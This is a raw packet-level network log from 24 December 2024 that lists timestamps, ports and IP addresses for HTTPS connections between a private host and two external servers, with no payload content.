Dec 24, 2024 15:12:36.663495064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.681313038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.681402922 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.681704044 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.681756973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.697195053 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.697355032 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.697632074 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.697685003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.698487997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.698561907 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.699340105 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.699392080 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.711637974 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.711704969 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.712140083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.712187052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.745835066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.790534019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.790712118 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.791100025 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.791153908 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.791735888 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.791785002 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.792586088 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.792632103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.793781996 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.793838024 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.794750929 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.794831991 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.795602083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.795658112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.796588898 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.796629906 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.797326088 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.797374964 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.798224926 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.798270941 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.837297916 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.837393045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.837635040 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.837682962 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.838686943 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.838742018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.840529919 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.840585947 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.841200113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.841247082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.842289925 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.842345953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.842905998 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.842956066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.843735933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.843781948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.844568014 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.844614029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.845423937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.845478058 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.853437901 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.853502989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.853806019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.853852034 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.854707956 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.854763985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.855546951 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.855597019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.873609066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.873673916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.874399900 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.874455929 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.891964912 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.892030001 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.892227888 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.892283916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.893317938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.893368006 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.894016981 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.894063950 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.903878927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.903930902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.904736042 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.904774904 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.954360962 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.982777119 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.982970953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.983633041 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.983741045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.984513998 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.984560966 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.985333920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.985378981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.986273050 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.986316919 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.987135887 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.987178087 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.987951994 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.987999916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.988812923 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.988857985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.990547895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.990587950 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.991367102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.991406918 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.029702902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.029777050 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.030489922 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.030541897 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.031322002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.031371117 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.032257080 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.032304049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.033130884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.033179998 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.033946991 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.033991098 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.034849882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.034897089 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.035738945 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.035788059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.036575079 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.036623955 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.038265944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.038345098 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.045836926 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.045897007 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.046380997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.046427965 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.047168970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.047221899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.048011065 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.048057079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.066149950 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.066237926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.066906929 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.066953897 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.084101915 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.084264994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.084947109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.085001945 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.085814953 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.085863113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.086690903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.086741924 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.096133947 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.096196890 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.096744061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.096890926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.175040960 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.175122023 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.175901890 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.175957918 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.176779985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.176830053 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.177519083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.177643061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.177691936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.178457022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.178497076 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.179335117 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.179387093 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.181098938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.181145906 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.181941986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.181988001 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.182818890 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.182863951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.183734894 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.183779001 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.221935034 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.221999884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.222642899 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.222702980 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.223295927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.223337889 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.225064039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.225117922 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.225923061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.225977898 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.226818085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.226865053 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.227650881 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.227695942 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.228573084 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.228620052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.229379892 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.229419947 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.230309010 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.230353117 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.237994909 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.238056898 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.239173889 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.239223003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.240145922 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.240195036 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.240919113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.240967035 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.258445024 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.258681059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.259624958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.259708881 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.276711941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.276794910 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.277693033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.277738094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.278572083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.278615952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.279407024 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.279448032 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.288403034 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.288454056 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.289604902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.289654970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.367939949 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.368128061 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.368779898 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.368840933 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.369582891 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.369637012 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.370620012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.370681047 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.371686935 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.371747017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.372498989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.372554064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.373455048 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.373511076 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.374340057 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.374411106 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.375164986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.375217915 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.376094103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.376152039 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.403019905 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.416495085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.416599035 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.417228937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.417289972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.418092966 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.418143988 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.418950081 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.419008017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.419780970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.419836998 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.420788050 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.420842886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.421663046 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.421714067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.422370911 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.422425985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.424201965 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.424293995 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.438524961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.438590050 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.438913107 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.438968897 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.439776897 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.439836025 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.440661907 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.440713882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.451735020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.451788902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.452131987 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.452174902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.479651928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.479686975 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.479716063 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.479723930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.479753017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.479769945 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.480478048 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.480541945 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.480546951 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.480590105 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.480591059 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:37.480633974 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:37.679289103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:38.389065981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:38.389096022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:38.577557087 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:38.577601910 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:38.577776909 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:38.577950001 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:38.577964067 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:40.799246073 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:40.799324989 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:40.799913883 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:40.799927950 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:40.800101995 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:40.800107002 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.366017103 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.366036892 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.366122007 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.366138935 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.366187096 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.382663012 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.382729053 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.399337053 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.399403095 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.407871962 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.407933950 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.557801008 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.557894945 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.569423914 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.569497108 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.585181952 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.585257053 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.585268974 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.585306883 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.585331917 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.585351944 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.585464954 CET	49741	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.585481882 CET	443	49741	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.601664066 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.601691008 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:41.601763964 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.602008104 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:41.602016926 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:43.900285006 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:43.900357962 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:43.903578043 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:43.903584957 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:43.903795004 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:43.903800011 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.478007078 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.478044987 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.478063107 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.478072882 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.478084087 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.478120089 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.493532896 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.493604898 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.493612051 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.493648052 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:44.493654966 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.493701935 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.494143009 CET	49742	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:44.494151115 CET	443	49742	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:57.513453007 CET	49743	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:12:57.513514042 CET	443	49743	118.178.60.9	192.168.2.4
Dec 24, 2024 15:12:57.513588905 CET	49743	443	192.168.2.4	118.178.60.9
